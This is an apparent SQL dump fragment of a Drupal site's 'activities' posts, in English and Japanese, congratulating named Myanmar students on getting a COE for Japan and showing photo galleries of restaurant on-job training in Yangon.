('activities', 0, 91, 480, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations HNIN EI PHYU &amp; EI SHWE ZIN &amp; AUNG ZIN OO For Getting COE<img src=\"/sites/default/files/inline-images/AUNG%20ZIN%20KO.jpg\" data-entity-uuid=\"1f473f5c-0d06-4380-98e1-af1f06d81b3e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Ei%20Shwe%20Zin.jpg\" data-entity-uuid=\"35704e3e-a6dc-466f-afc3-e9f68aff58cf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Hnin%20Pwint%20Phyu.jpg\" data-entity-uuid=\"34af725f-866d-4124-ad46-625b9369b571\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 91, 480, 'ja', 0, '<blockquote><h2>おめでとう！</h2></blockquote><p>HNIN EI PHYU さん、EI SHWE ZIN さん、AUNG ZIN OO さん、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/AUNG%20ZIN%20KO.jpg\" data-entity-uuid=\"1f473f5c-0d06-4380-98e1-af1f06d81b3e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Ei%20Shwe%20Zin.jpg\" data-entity-uuid=\"35704e3e-a6dc-466f-afc3-e9f68aff58cf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Hnin%20Pwint%20Phyu.jpg\" data-entity-uuid=\"34af725f-866d-4124-ad46-625b9369b571\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 92, 481, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations YA MIN THET &amp; SHIN THANT PHYU For Getting COE<img data-entity-uuid=\"86fe3516-a24b-4295-91dc-932863cdc3cf\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/shin%20thant%20phyu.jpg\"><img data-entity-uuid=\"ba08b50a-d080-4016-96a2-ec28527df846\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/ya%20min%20thant.jpg\"></p>', '', 'full_html'),
('activities', 0, 92, 482, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations YA MIN THET &amp; SHIN THANT PHYU For Getting COE<img data-entity-uuid=\"86fe3516-a24b-4295-91dc-932863cdc3cf\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/shin%20thant%20phyu.jpg\"><img data-entity-uuid=\"ba08b50a-d080-4016-96a2-ec28527df846\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/ya%20min%20thant.jpg\"></p>', '', 'full_html'),
('activities', 0, 92, 482, 'ja', 0, '<blockquote><h2>おめでとう！</h2></blockquote><p>YA MIN THET さんと SHIN THANT PHYU さん、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/shin%20thant%20phyu.jpg\" data-entity-uuid=\"86fe3516-a24b-4295-91dc-932863cdc3cf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ya%20min%20thant.jpg\" data-entity-uuid=\"ba08b50a-d080-4016-96a2-ec28527df846\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 93, 483, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations KHAING HNIN WAI &amp; EI EI PHYO &amp; EI EI MIN &amp; NAN THAE NU SOE For Getting COE<img data-entity-uuid=\"16a5094a-28f4-411c-83fa-e15ba391288b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/ei%20ei%20min.jpg\"><img><img data-entity-uuid=\"0498a148-f35d-464f-8e0b-fffdd9d41791\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khaing%20hnin%20wai.jpg\"><img data-entity-uuid=\"f7fb4683-4a6e-48cf-9181-6d3817e0ef67\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Nan%20thae%20nu%20soe.jpg\"></p>', '', 'full_html'),
('activities', 0, 93, 484, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations KHAING HNIN WAI &amp; EI EI PHYO &amp; EI EI MIN &amp; NAN THAE NU SOE For Getting COE<img data-entity-uuid=\"16a5094a-28f4-411c-83fa-e15ba391288b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/ei%20ei%20min.jpg\"><img><img data-entity-uuid=\"0498a148-f35d-464f-8e0b-fffdd9d41791\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khaing%20hnin%20wai.jpg\"><img data-entity-uuid=\"f7fb4683-4a6e-48cf-9181-6d3817e0ef67\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Nan%20thae%20nu%20soe.jpg\"></p>', '', 'full_html'),
('activities', 0, 93, 484, 'ja', 0, '<blockquote><h2>おめでとう！</h2></blockquote><p>KHAING HNIN WAI &amp; EI EI PHYO &amp; EI EI MIN &amp; NAN THAE NU SOE COE取得おめでとうございます<img src=\"/sites/default/files/inline-images/ei%20ei%20min.jpg\" data-entity-uuid=\"16a5094a-28f4-411c-83fa-e15ba391288b\" data-entity-type=\"file\"><img><img src=\"/sites/default/files/inline-images/khaing%20hnin%20wai.jpg\" data-entity-uuid=\"0498a148-f35d-464f-8e0b-fffdd9d41791\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Nan%20thae%20nu%20soe.jpg\" data-entity-uuid=\"f7fb4683-4a6e-48cf-9181-6d3817e0ef67\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 94, 485, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations NYEIN EI EI SHWE &amp; EI EI MON &nbsp;For Getting COE<img data-entity-uuid=\"9eded7af-c141-4a8d-aeb9-991c8bdf33ae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/ei%20ei%20mon.jpg\"><img data-entity-uuid=\"43907b43-a93b-4b40-9c16-d06b9d91c40f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/nyein%20ei%20ei%20shwe.jpg\"></p>', '', 'full_html'),
('activities', 0, 95, 486, 'en', 0, '<blockquote><p>Images for 2nd Batch Students participating in on-job training at YANGON\'s Famous Restaurants for more experiences to gain.&nbsp;</p></blockquote><img data-entity-uuid=\"f55c58d0-0dc4-4ab7-a8ef-a06f23025b82\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_2.jpg\"><img data-entity-uuid=\"e43640aa-0416-483b-9f74-4b931881a554\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_2.jpg\"><img data-entity-uuid=\"a95c0918-82a4-4a55-81f9-1081a3572ed6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_2.jpg\"><img data-entity-uuid=\"833b6a48-32d2-49c4-9289-a8f56282609e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_2.jpg\"><img data-entity-uuid=\"d8dea806-be35-47f5-afe1-e09cf2ca0e33\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/5_0.jpg\"><img data-entity-uuid=\"9b72d526-fc43-4216-906a-a4e3f8d5c10a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/6_0.jpg\"><img data-entity-uuid=\"34b1b390-b965-4ef8-a414-e4c43d4cec36\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/7.jpg\"><img data-entity-uuid=\"2af8bad1-9df7-4a9d-a1b1-5f994ad47a5c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/8.jpg\"><img data-entity-uuid=\"619549dd-fd24-4f16-ab78-9e983128f35a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/9.jpg\"><img data-entity-uuid=\"aa9b0bb2-e3da-44de-8a9f-8f606dcb8d3c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/10.jpg\"><img data-entity-uuid=\"6c81fed4-3ff4-491a-8afc-eb7abed11dc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/11_4.jpg\"><img data-entity-uuid=\"9423da42-a7d4-436a-9e5b-085a27741e43\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/12.jpg\"><img data-entity-uuid=\"c6568cda-7e75-411f-90bc-152646c08074\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/13.jpg\"><img data-entity-uuid=\"c306aca8-f7d3-4fb1-9c63-f35852f953a0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/14.jpg\"><img data-entity-uuid=\"39fda66d-1b1a-418d-a77e-cd4975c52053\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/15.jpg\"><img data-entity-uuid=\"0a1ec768-aefe-4234-b9e9-3ff5f5ed28bd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/16.jpg\"><img data-entity-uuid=\"06104a5e-ddc4-44a9-a044-d21776f9055b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/17.jpg\"><img data-entity-uuid=\"34cefc7b-ace8-49e7-a30b-3f25f3c241a3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/18.jpg\">', '', 'full_html'),
('activities', 0, 95, 487, 'en', 0, '<blockquote><p>Images for 2nd Batch Students participating in on-job training at YANGON\'s Famous Restaurants for more experiences to gain.&nbsp;</p></blockquote><img data-entity-uuid=\"f55c58d0-0dc4-4ab7-a8ef-a06f23025b82\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_2.jpg\"><img data-entity-uuid=\"e43640aa-0416-483b-9f74-4b931881a554\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_2.jpg\"><img data-entity-uuid=\"a95c0918-82a4-4a55-81f9-1081a3572ed6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_2.jpg\"><img data-entity-uuid=\"833b6a48-32d2-49c4-9289-a8f56282609e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_2.jpg\"><img data-entity-uuid=\"d8dea806-be35-47f5-afe1-e09cf2ca0e33\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/5_0.jpg\"><img data-entity-uuid=\"9b72d526-fc43-4216-906a-a4e3f8d5c10a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/6_0.jpg\"><img data-entity-uuid=\"34b1b390-b965-4ef8-a414-e4c43d4cec36\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/7.jpg\"><img data-entity-uuid=\"2af8bad1-9df7-4a9d-a1b1-5f994ad47a5c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/8.jpg\"><img data-entity-uuid=\"619549dd-fd24-4f16-ab78-9e983128f35a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/9.jpg\"><img data-entity-uuid=\"aa9b0bb2-e3da-44de-8a9f-8f606dcb8d3c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/10.jpg\"><img data-entity-uuid=\"6c81fed4-3ff4-491a-8afc-eb7abed11dc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/11_4.jpg\"><img data-entity-uuid=\"9423da42-a7d4-436a-9e5b-085a27741e43\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/12.jpg\"><img data-entity-uuid=\"c6568cda-7e75-411f-90bc-152646c08074\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/13.jpg\"><img data-entity-uuid=\"c306aca8-f7d3-4fb1-9c63-f35852f953a0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/14.jpg\"><img data-entity-uuid=\"39fda66d-1b1a-418d-a77e-cd4975c52053\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/15.jpg\"><img data-entity-uuid=\"0a1ec768-aefe-4234-b9e9-3ff5f5ed28bd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/16.jpg\"><img data-entity-uuid=\"06104a5e-ddc4-44a9-a044-d21776f9055b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/17.jpg\"><img data-entity-uuid=\"34cefc7b-ace8-49e7-a30b-3f25f3c241a3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/18.jpg\">', '', 'full_html'),
('activities', 0, 95, 487, 'ja', 0, '<blockquote><h3><strong>さらなる経験を積むためにヤンゴンの有名レストランで実務研修に参加する第2バッチの学生たちの写真。</strong></h3></blockquote><img src=\"/sites/default/files/inline-images/1_2.jpg\" data-entity-uuid=\"f55c58d0-0dc4-4ab7-a8ef-a06f23025b82\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2_2.jpg\" data-entity-uuid=\"e43640aa-0416-483b-9f74-4b931881a554\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3_2.jpg\" data-entity-uuid=\"a95c0918-82a4-4a55-81f9-1081a3572ed6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4_2.jpg\" data-entity-uuid=\"833b6a48-32d2-49c4-9289-a8f56282609e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/5_0.jpg\" data-entity-uuid=\"d8dea806-be35-47f5-afe1-e09cf2ca0e33\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/6_0.jpg\" data-entity-uuid=\"9b72d526-fc43-4216-906a-a4e3f8d5c10a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/7.jpg\" data-entity-uuid=\"34b1b390-b965-4ef8-a414-e4c43d4cec36\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/8.jpg\" data-entity-uuid=\"2af8bad1-9df7-4a9d-a1b1-5f994ad47a5c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/9.jpg\" data-entity-uuid=\"619549dd-fd24-4f16-ab78-9e983128f35a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/10.jpg\" data-entity-uuid=\"aa9b0bb2-e3da-44de-8a9f-8f606dcb8d3c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/11_4.jpg\" data-entity-uuid=\"6c81fed4-3ff4-491a-8afc-eb7abed11dc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/12.jpg\" data-entity-uuid=\"9423da42-a7d4-436a-9e5b-085a27741e43\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/13.jpg\" data-entity-uuid=\"c6568cda-7e75-411f-90bc-152646c08074\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/14.jpg\" data-entity-uuid=\"c306aca8-f7d3-4fb1-9c63-f35852f953a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/15.jpg\" data-entity-uuid=\"39fda66d-1b1a-418d-a77e-cd4975c52053\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/16.jpg\" data-entity-uuid=\"0a1ec768-aefe-4234-b9e9-3ff5f5ed28bd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/17.jpg\" data-entity-uuid=\"06104a5e-ddc4-44a9-a044-d21776f9055b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/18.jpg\" data-entity-uuid=\"34cefc7b-ace8-49e7-a30b-3f25f3c241a3\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 95, 524, 'en', 0, '<blockquote><p>Images for 3th Batch Students participating in on-job training at YANGON\'s Famous Restaurants for more experiences to gain.&nbsp;</p></blockquote><img src=\"/sites/default/files/inline-images/1_2.jpg\" data-entity-uuid=\"f55c58d0-0dc4-4ab7-a8ef-a06f23025b82\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2_2.jpg\" data-entity-uuid=\"e43640aa-0416-483b-9f74-4b931881a554\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3_2.jpg\" data-entity-uuid=\"a95c0918-82a4-4a55-81f9-1081a3572ed6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4_2.jpg\" data-entity-uuid=\"833b6a48-32d2-49c4-9289-a8f56282609e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/5_0.jpg\" data-entity-uuid=\"d8dea806-be35-47f5-afe1-e09cf2ca0e33\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/6_0.jpg\" data-entity-uuid=\"9b72d526-fc43-4216-906a-a4e3f8d5c10a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/7.jpg\" data-entity-uuid=\"34b1b390-b965-4ef8-a414-e4c43d4cec36\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/8.jpg\" data-entity-uuid=\"2af8bad1-9df7-4a9d-a1b1-5f994ad47a5c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/9.jpg\" data-entity-uuid=\"619549dd-fd24-4f16-ab78-9e983128f35a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/10.jpg\" data-entity-uuid=\"aa9b0bb2-e3da-44de-8a9f-8f606dcb8d3c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/11_4.jpg\" data-entity-uuid=\"6c81fed4-3ff4-491a-8afc-eb7abed11dc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/12.jpg\" data-entity-uuid=\"9423da42-a7d4-436a-9e5b-085a27741e43\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/13.jpg\" data-entity-uuid=\"c6568cda-7e75-411f-90bc-152646c08074\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/14.jpg\" data-entity-uuid=\"c306aca8-f7d3-4fb1-9c63-f35852f953a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/15.jpg\" data-entity-uuid=\"39fda66d-1b1a-418d-a77e-cd4975c52053\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/16.jpg\" data-entity-uuid=\"0a1ec768-aefe-4234-b9e9-3ff5f5ed28bd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/17.jpg\" data-entity-uuid=\"06104a5e-ddc4-44a9-a044-d21776f9055b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/18.jpg\" data-entity-uuid=\"34cefc7b-ace8-49e7-a30b-3f25f3c241a3\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 95, 524, 'ja', 0, '<blockquote><h3><strong>さらなる経験を積むためにヤンゴンの有名レストランで実務研修に参加する第2バッチの学生たちの写真。</strong></h3></blockquote><img src=\"/sites/default/files/inline-images/1_2.jpg\" data-entity-uuid=\"f55c58d0-0dc4-4ab7-a8ef-a06f23025b82\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2_2.jpg\" data-entity-uuid=\"e43640aa-0416-483b-9f74-4b931881a554\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3_2.jpg\" data-entity-uuid=\"a95c0918-82a4-4a55-81f9-1081a3572ed6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4_2.jpg\" data-entity-uuid=\"833b6a48-32d2-49c4-9289-a8f56282609e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/5_0.jpg\" data-entity-uuid=\"d8dea806-be35-47f5-afe1-e09cf2ca0e33\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/6_0.jpg\" data-entity-uuid=\"9b72d526-fc43-4216-906a-a4e3f8d5c10a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/7.jpg\" data-entity-uuid=\"34b1b390-b965-4ef8-a414-e4c43d4cec36\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/8.jpg\" data-entity-uuid=\"2af8bad1-9df7-4a9d-a1b1-5f994ad47a5c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/9.jpg\" data-entity-uuid=\"619549dd-fd24-4f16-ab78-9e983128f35a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/10.jpg\" data-entity-uuid=\"aa9b0bb2-e3da-44de-8a9f-8f606dcb8d3c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/11_4.jpg\" data-entity-uuid=\"6c81fed4-3ff4-491a-8afc-eb7abed11dc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/12.jpg\" data-entity-uuid=\"9423da42-a7d4-436a-9e5b-085a27741e43\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/13.jpg\" data-entity-uuid=\"c6568cda-7e75-411f-90bc-152646c08074\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/14.jpg\" data-entity-uuid=\"c306aca8-f7d3-4fb1-9c63-f35852f953a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/15.jpg\" data-entity-uuid=\"39fda66d-1b1a-418d-a77e-cd4975c52053\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/16.jpg\" data-entity-uuid=\"0a1ec768-aefe-4234-b9e9-3ff5f5ed28bd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/17.jpg\" data-entity-uuid=\"06104a5e-ddc4-44a9-a044-d21776f9055b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/18.jpg\" data-entity-uuid=\"34cefc7b-ace8-49e7-a30b-3f25f3c241a3\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 96, 488, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations NYEIN EI EI SHWE &amp; EI EI MON For Getting COE<img src=\"/sites/default/files/inline-images/Ei%20Ei%20Mon.jpg\" data-entity-uuid=\"e9598b10-e9d4-4106-b2a3-e9a15e7b1431\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Nyein%20Ei%20Ei%20shwe.jpg\" data-entity-uuid=\"2c761e77-09d4-4d40-a1aa-2dc855a27603\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 96, 489, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations NYEIN EI EI SHWE &amp; EI EI MON For Getting COE<img src=\"/sites/default/files/inline-images/Ei%20Ei%20Mon.jpg\" data-entity-uuid=\"e9598b10-e9d4-4106-b2a3-e9a15e7b1431\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Nyein%20Ei%20Ei%20shwe.jpg\" data-entity-uuid=\"2c761e77-09d4-4d40-a1aa-2dc855a27603\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 96, 489, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>NYEIN EI EI SHWE と EI EI MON、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/Ei%20Ei%20Mon.jpg\" data-entity-uuid=\"e9598b10-e9d4-4106-b2a3-e9a15e7b1431\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Nyein%20Ei%20Ei%20shwe.jpg\" data-entity-uuid=\"2c761e77-09d4-4d40-a1aa-2dc855a27603\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 97, 490, 'en', 0, '<blockquote><h2>Congralutations!</h2></blockquote><p>Congralutations YU YU NWAY &amp; WIN PYAE SHAN &amp; KHIN KHIN KYAW &amp; HNIN THAZIN AUNG &amp; THET MYAT MYAT KHAING For Getting COE</p>', '', 'full_html'),
('activities', 0, 97, 491, 'en', 0, '<blockquote><h2>Congralutations!</h2></blockquote><p>Congralutations YU YU NWAY &amp; WIN PYAE SHAN &amp; KHIN KHIN KYAW &amp; HNIN THAZIN AUNG &amp; THET MYAT MYAT KHAING For Getting COE</p>', '', 'full_html'),
('activities', 0, 97, 491, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>YU YU NWAY、WIN PYAE SHAN、KHIN KHIN KYAW、HNIN THAZIN AUNG、THET MYAT MYAT KHAING、COE 取得おめでとうございます</p>', '', 'full_html'),
('activities', 0, 98, 492, 'en', 0, '<blockquote><p>Images of Restaurant Practical Training Class for 2nd Batch Students from NEW COMET.&nbsp;</p></blockquote><p>You don\'t have to worry about not getting enough experience for TOKUTEI GAISHOKU in Japan. All you have to do is to study hard and passing the interview is the ultimate Priority.&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"d18f27cd-d715-4b28-bbbb-0d66b137413a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_3.jpg\"><img data-entity-uuid=\"513ce649-00a4-4e66-ac9d-53af20aa48b5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_3.jpg\"><img data-entity-uuid=\"25f3e96e-4512-46a6-b92f-ee8868ca846a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_3.jpg\"><img data-entity-uuid=\"34d06090-f0cc-4ec8-937f-586a3252035c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_3.jpg\"><img data-entity-uuid=\"1caed8cb-fed6-4080-8df9-6de95a0f908d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/5_1.jpg\"><img data-entity-uuid=\"045afe86-0484-4003-b1c0-665a76524220\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/6_1.jpg\"><img data-entity-uuid=\"71665b06-ac33-416b-b7c5-61a8bbe946c3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/7_0.jpg\"><img data-entity-uuid=\"c7472549-3fe6-4aab-9f4f-75218dfb390e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/8_0.jpg\"><img data-entity-uuid=\"c09fa45d-fb6d-41fe-81cc-8861a942c7cf\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/9_0.jpg\"><img data-entity-uuid=\"b2ef25f0-89a4-461d-8b0b-e0306b3041db\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/10_0.jpg\"><img data-entity-uuid=\"d8f1ccf8-f54e-4940-8a11-74d011481187\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/11_5.jpg\"><img data-entity-uuid=\"7d5de3e5-0ed7-447b-bd64-0d789324043d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/12_0.jpg\"><img data-entity-uuid=\"775d5929-7013-4d99-86bd-aa0eb4faa580\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/13_0.jpg\"><img data-entity-uuid=\"08885aeb-3fe8-4c77-b2c4-be5c8f33b046\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/14_0.jpg\"><img data-entity-uuid=\"f23b1683-c5fe-4714-8537-5077371ebe00\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/15_0.jpg\"><img data-entity-uuid=\"cde4d163-3db2-433b-8299-9821cc3975e8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/16_0.jpg\"><img data-entity-uuid=\"fbfdfda9-7e7e-4116-a701-e69262ed6c28\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/17_0.jpg\"><img data-entity-uuid=\"eae545a2-eb3b-4b3f-8784-dd48cbad9d48\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/18_0.jpg\"><img data-entity-uuid=\"6f53592e-cd27-4faf-8626-06e8ff195f50\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/19.jpg\"><img data-entity-uuid=\"d6c8469c-1b6a-4ea7-a07c-c03a2d7d1f57\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/20.jpg\">', '', 'full_html'),
('activities', 0, 98, 493, 'en', 0, '<blockquote><p>Images of Restaurant Practical Training Class for 2nd Batch Students from NEW COMET.&nbsp;</p></blockquote><p>You don\'t have to worry about not getting enough experience for TOKUTEI GAISHOKU in Japan. All you have to do is to study hard and passing the interview is the ultimate Priority.&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"d18f27cd-d715-4b28-bbbb-0d66b137413a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_3.jpg\"><img data-entity-uuid=\"513ce649-00a4-4e66-ac9d-53af20aa48b5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_3.jpg\"><img data-entity-uuid=\"25f3e96e-4512-46a6-b92f-ee8868ca846a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_3.jpg\"><img data-entity-uuid=\"34d06090-f0cc-4ec8-937f-586a3252035c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_3.jpg\"><img data-entity-uuid=\"1caed8cb-fed6-4080-8df9-6de95a0f908d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/5_1.jpg\"><img data-entity-uuid=\"045afe86-0484-4003-b1c0-665a76524220\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/6_1.jpg\"><img data-entity-uuid=\"71665b06-ac33-416b-b7c5-61a8bbe946c3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/7_0.jpg\"><img data-entity-uuid=\"c7472549-3fe6-4aab-9f4f-75218dfb390e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/8_0.jpg\"><img data-entity-uuid=\"c09fa45d-fb6d-41fe-81cc-8861a942c7cf\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/9_0.jpg\"><img data-entity-uuid=\"b2ef25f0-89a4-461d-8b0b-e0306b3041db\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/10_0.jpg\"><img data-entity-uuid=\"d8f1ccf8-f54e-4940-8a11-74d011481187\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/11_5.jpg\"><img data-entity-uuid=\"7d5de3e5-0ed7-447b-bd64-0d789324043d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/12_0.jpg\"><img data-entity-uuid=\"775d5929-7013-4d99-86bd-aa0eb4faa580\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/13_0.jpg\"><img data-entity-uuid=\"08885aeb-3fe8-4c77-b2c4-be5c8f33b046\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/14_0.jpg\"><img data-entity-uuid=\"f23b1683-c5fe-4714-8537-5077371ebe00\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/15_0.jpg\"><img data-entity-uuid=\"cde4d163-3db2-433b-8299-9821cc3975e8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/16_0.jpg\"><img 